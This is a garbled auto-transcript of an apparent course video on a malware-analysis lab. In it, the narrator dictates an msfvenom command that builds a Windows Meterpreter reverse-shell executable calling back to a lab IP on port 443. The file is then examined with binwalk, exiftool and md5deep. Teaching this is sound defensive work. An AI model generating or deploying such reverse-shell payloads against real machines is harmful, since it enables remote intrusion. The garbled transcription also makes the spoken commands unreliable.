Analyze and Classify Malware Lab

00:00

Hey, everyone, welcome back to the core. So in the last video, we take a look at how control number eight form our defenses. How that mapped after the next cybersecurity framework. In this video, we're to do a simple lab where we analyze and classify malware. So we're basically going to be creating and execute herbal and then analyzing that execute herbal file.

00:18

So make sure your loved into the cyber lab environment and sees the inside of your cyber account. And then once you do so, search for the analyzing classified Mauer Lab. Once you locate, that's like the launch button, and the launch item button usually takes about 30 seconds to a minute for the lab. The launch and then you'll see the screen like we have behind me right there.

00:36

Now these step by step lab guides, as usual, are in the resource is section of the course. If you have any trouble downloading those peace reset to the support team.

00:44

So once you're loved into the lab, go ahead and log into the Cali machine, so just click the other option there, and then we're gonna log in with the traditional Callie credentials, which is the user Name of root R o t All over case and then the password of tour T o r. Although case

01:00

and you'll see us step by step lab guide here. I've also got that listed out for you as well.

01:06

So it's going to take a moment or so for the Cali desktop to boot up for us. Once it pulls up for us here, we're going to select the terminal icon just to launch the terminal for us. And then what we're going to do is go ahead and create our malicious execute herbal file.

01:19

So we're gonna like the terminal icon right here. It's this little black box. Just go ahead and select that. That will open the terminal prompt for you.

01:26

And there were gonna be typing this long command right here. I'm gonna read through it, and then we'll just go ahead and type it in our command. Prompt. So feel free to pause the video here and type in this entire command. But we're gonna be typing in MSF venom

01:40

Space dash lower case a space. Lower case X 86

01:46

space. Lower case. Dash platform space windows space dash P space windows Ford slash interpreter for it slash reverse underscore TCP space capital l host equals And then this i p address space capital l port equals And then this port number right here for 43

02:06

space dash lower case F space e X e

02:08

space dash lower case oh, space and then malicious file dot t x c. That's a whole lot to say and a whole lot to type fence, and we'll get started on that one thing before we do. So I want to mention is Be sure as you're going through this lab of following the steps. Be sure to click through the menu options here and select them

02:27

as you go throwing and complete each area.

02:30

Make sure you go ahead and select those You could get full completion for the lab. Once you're done, you'll notice that I'm not going to do that. The rest of these throughout this lab, because I'm not worried about saving this lab. But be sure to do it on your end. She could get full credit for completing this lab,

02:44

so let's go ahead and get started here. So again, pause a video here and you could type in the command yourself if you want to.

02:51

Otherwise you can follow along as I type it in. So we're gonna type in lower case MSF venom,

02:57

a space lower case. Dash a

03:00

space lower case X in the number 86 altogether

03:04

space, and we're gonna put two dashes

03:07

and then the word platform

03:09

space windows,

03:12

space dash Lower case P

03:15

space windows, ford slash

03:19

Ritter printer,

03:22

another Ford slash and then reverse the underscore symbol. And then TCP

03:28

space capital l host

03:30

the equal sign. And then the i p address I mentioned before. So the 1 92 168.0 dot 100

03:38

we'll put another space, and then we're gonna specify the port number, so l port all caps

03:43

equals 4 43

03:46

space dash lower case f

03:49

space e X e Oliver case Space dash. Oh,

03:53

and then finally space malicious

03:58

file dot He xy

04:00

Now, in the real world, you're not gonna normally find malware that's listed as malicious file dot Txt right. It's not that simple, but for our purposes, that's what really name it in this lab. So once you typed all of that and again, you can pause a video. Take your time typing that in,

04:13

uh, and didn't just restart the video. Once you're done, once you've typed all that in, just hit the enter key there. It's going to take a little bit to create this file for us. Once it does, we're just gonna verify that it's actually created the file for us. So I'm gonna briefly pause a video while we wait and it to create that file.

04:29

All right, so we see that is created the malicious filed on e x e. Let's go ahead and verify that. So we're just going to use the l s command toe list out the files, and we see there. Once we do that, we see malicious file dot txt is successfully created,

04:41

so let's go back to our step by step lab guys, we've done step seven here. That's where we typed in this long command to create our malicious execute herbal. We then just typed ls at the prompt. I'm gonna type in clear. You don't necessarily have to type in clear. I just like to keep my terminal pretty clear as I'm entering different commands.

04:59

The next step we're going to do is we're gonna start analyzing the files were to use a tool called been Walks. We're just gonna type in, been walk space, dash Capital B and then the space and then in the name of our file.

05:11

So let's go ahead and do that. Now we're gonna type in been walk space, dash Capital B and then the file name malicious file dot e x e

05:19

Just hit the enter key. There s a lot because that's just going to analyze a file for some common signatures for us.

05:27

All right, the next thing we're going to do is here in step 11 where to use been walk again. We're gonna put a dash three this time, and then we're going to take a look at that same malicious file.

05:35

So let's type that in. So been walk

05:39

space Dash three and then space, malicious file

05:43

dot e x e.

05:45

And so again, we're just analyzing here. We could get some basic data back about this particular file

05:49

and you'll see here that this gives us a visual of the file. So I always like to think of this as if you're a fan of Star Trek. The next generation this looks like a Borg ship to me. You see, it's kind of cube like that. So it just gives us a graphic of what this malicious file looks like.

06:05

So you can just go You can play around with, I just click on it and drag it around, and you could spend it all different ways and show your friends and everything. But for our purposes, you could just go ahead and close this out once you're done with it.

06:15

So let's go back to our step by step lab guide here. The next thing we're going to do is type in, been walk space, dash Capital A and then we're basically gonna be looking for any up codes at all. So let's take a look here. So been walk

06:28

space, dash capital A And then again, space and our file name Malicious file. Dottie XY.

06:35

All right, so we can take a look there and we see the hex that we get back. So

06:40

do you see any? Do you see any No operation up codes. Uh,

06:44

we do see some right there.

06:46

So step 13 we're gonna type in X. If tool space motions filed out, he xy

06:51

and then our final step of this lab is actually just performing a hash on the file itself.

06:57

So as you're analyzing malicious files, always good to get a hash of them so you can share that with others later on. And also put it in your ideas. I ps systems.

07:05

So accept tool.

07:06

It's police malicious file

07:10

dot he xy

07:13

and you'll see it will also give us some basic information about this particular file as well.

07:16

So, as I mentioned the very final step in this lavishes typing in to perform a hash, we're gonna do that with MD five deep. So just type in MD five deep, and then space and then malicious file dot e x e So empty five deep all over case

07:30

and then a space in the file name itself. So malicious file dot He xy

07:36

All right, so you see there we've performed the house of our file.

07:41

So in this video, we just took a look at creating a malicious file again. It was very simple, executed all file, and we normally wouldn't name it. Malicious file. Don t x c. We just took a look at at at it, though we created. And then we went ahead and analyze a file through a few various tools.